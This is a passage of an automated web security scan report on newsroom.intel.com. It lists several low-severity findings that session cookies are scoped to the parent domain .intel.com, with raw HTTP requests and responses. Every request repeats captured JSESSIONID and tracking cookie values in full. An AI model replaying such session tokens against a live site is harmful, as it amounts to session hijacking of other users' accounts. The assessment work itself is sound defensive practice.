Vary: Accept-Encoding
CacheHit: D=26463 t=1296956899733157
X-JSL: D=26470 t=1296956899733157
Content-Type: text/javascript;charset=UTF-8
Connection: close

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...

11.9. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:37 GMT
Server: Apache
Set-Cookie: JSESSIONID=EE4D59A501972634AF56AA68D8967AE2.node6IPR; Domain=.intel.com; Path=/
X-JAL: 1
Vary: Accept-Encoding
CacheHit: D=131861 t=1296956917538280
X-JSL: D=131867 t=1296956917538280
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
Content-Length: 20313

(function(c){var a=c.scrollTo=function(f,e,d){c(window).scrollTo(f,e,d)};a.defaults={axis:"xy",duration:parseFloat(c.fn.jquery)>=1.3?0:1};a.window=function(d){return c(window).scrollable()};c.fn.scrol
...[SNIP]...

11.10. http://newsroom.intel.com/4.0.6/styles/jive-community.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-community.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-community.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=5C2FF08678A49B81193C49BCB33E4E29.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 1
Vary: Accept-Encoding
CacheHit: D=133137 t=1296956878891570
X-JSL: D=133142 t=1296956878891570
Content-Type: text/css
Connection: keep-alive
Content-Length: 20341

/*
jive-community.css - styles for the community landing page.
*/


.jive-blog-post-message h3 {
   clear: both;
float: none;
}

/* container for use on the community pages */
#jive-b
...[SNIP]...

11.11. http://newsroom.intel.com/4.0.6/styles/jive-global.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-global.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-global.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=58D180D97AB319652D509966F32227A7.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=143063 t=1296956848658188
X-JSL: D=143069 t=1296956848658188
Content-Type: text/css
Connection: keep-alive
Content-Length: 208122

/* RESET STYLES (see http://meyerweb.com/eric/tools/css/reset/) */
/*
*
* this is not a straight copy/paste from the above URL. this has been
* custom modified by us. so don't go copy/paste u
...[SNIP]...

11.12. http://newsroom.intel.com/4.0.6/styles/jive-icons.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-icons.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-icons.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:29 GMT
Server: Apache
Set-Cookie: JSESSIONID=8C181A1B01DBE3858DD2ECB1E90CB81F.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=132982 t=1296956849476958
X-JSL: D=132987 t=1296956849476958
Content-Type: text/css
Connection: keep-alive
Content-Length: 25134

/* Things that might be sprited */
.jive-icon-plus,
.jive-icon-minus {
   /* edit widget layouts, leave before standard sprites */
   background-repeat: no-repeat;
   background-position: 0;
   padding: 2px
...[SNIP]...

11.13. http://newsroom.intel.com/4.0.6/styles/jive-sidebar.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-sidebar.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-sidebar.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:44 GMT
Server: Apache
Set-Cookie: JSESSIONID=351863A282E6B8E427C3AA53A775A16B.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=128681 t=1296956864616423
X-JSL: D=128686 t=1296956864616423
Content-Type: text/css
Connection: keep-alive
Content-Length: 28548

/*
jive-sidebar.css
*/
.jive-sidebar {
border: 1px solid #e5e5e5;
font-size: 1em;
margin: 0 0 25px;
overflow: hidden;
padding: 0;
position: relative; /* req for IEs */
-moz
...[SNIP]...

11.14. http://newsroom.intel.com/4.0.6/styles/jive-videomodule.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-videomodule.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-videomodule.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=C7BC34108896684F5F49C2D9A038A463.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=128999 t=1296956879588525
X-JSL: D=129004 t=1296956879588525
Content-Type: text/css
Connection: keep-alive
Content-Length: 32219

/* videomodule.css */
/* this stylesheet contains browser-specific styles for IE6 (* html) and IE7 (*+html) */

/* Styles for creating and editing a video post */
.jive-video {
clear: both;
bo
...[SNIP]...

11.15. http://newsroom.intel.com/4.0.6/styles/jive-widgets.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-widgets.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-widgets.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:03 GMT
Server: Apache
Set-Cookie: JSESSIONID=2ACD8803AAF9142ABE9BBE7400602B75.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=132338 t=1296956883117344
X-JSL: D=132344 t=1296956883117344
Content-Type: text/css
Connection: keep-alive
Content-Length: 84448


/* overrides for elements while customizing a page */
body.jive-body-widget-customizing #jive-body #jive-body-intro,
body.jive-body-widget-customizing #jive-body #jive-breadcrumb,
body.jive-body-wi
...[SNIP]...

11.16. http://newsroom.intel.com/4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=1B1A7CDD00A68C13A37ECE38A66CD9D7.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=131620 t=1296956878654373
X-JSL: D=131626 t=1296956878654373
Content-Type: text/css
Connection: keep-alive
Content-Length: 9250

/* Clearlooks 2 */

/* Reset */
.clearlooks2, .clearlooks2 div, .clearlooks2 span, .clearlooks2 a {vertical-align:baseline; text-align:left; position:absolute; border:0; padding:0; margin:0; backgroun
...[SNIP]...

11.17. http://newsroom.intel.com/community/intel_newsroom/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/intel_newsroom/?iid=ftr+press HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/about/index.htm?iid=gg_about-en_US+intel_aboutintel
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:11:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; Domain=.intel.com; Path=/
Set-Cookie: jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; Version=1; Path=/
Set-Cookie: jive.recentHistory.-1=31342c323031363b; Expires=Mon, 07-Mar-2011 23:11:11 GMT; Path=/
X-JAL: 613
Content-Language: en-US
CacheHit: D=624946 t=1296947469127528
X-JSL: D=624952 t=1296947469127528
Cache-Control: no-cache
